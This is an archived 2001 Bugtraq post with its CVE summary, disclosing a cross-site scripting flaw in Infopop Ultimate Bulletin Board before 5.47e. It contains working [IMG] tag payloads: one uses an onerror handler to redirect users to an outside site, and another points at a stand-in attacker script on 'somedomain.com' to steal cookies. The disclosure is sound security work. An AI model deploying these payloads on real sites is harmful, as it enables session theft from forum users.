Headline
CVE-2001-0897: 'UBB vulnerablietis + about: using example'
Cross-site scripting vulnerability in Infopop Ultimate Bulletin Board (UBB) before 5.47e allows remote attackers to steal user cookies via an [IMG] tag that references an about: URL with an onerror field.
[prev in list] [next in list] [prev in thread] [next in thread] List: bugtraq Subject: UBB vulnerablietis + about: using example From: kyprizel <kyprizel () hostel ! tusur ! ru> Date: 2001-11-15 19:10:50 [Download RAW message or body]
������������, ���������(��) bugtraq, Posting something like this UBB tag: [IMG]http://about:test"onerror="top.location.href=’http://punk.tomsk.ru’;[/IMG] to Infopop Ultimate Bulletin Board, we are able to redirect users browser to http://punk.tomsk.ru There are many ways to stole cookies using this vulnerabliety, one of them: [IMG]http://about:test"onerror="this.src=’http://somedomain.com/yourscript.php’;[/IMG] and yourscript.php - is a script to recieve users cookies 8)
– // �.������ AKA kyprizel mailto:[email protected] ICQ#3337333 – “Knowlege itself is power…” F.Bacon –
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic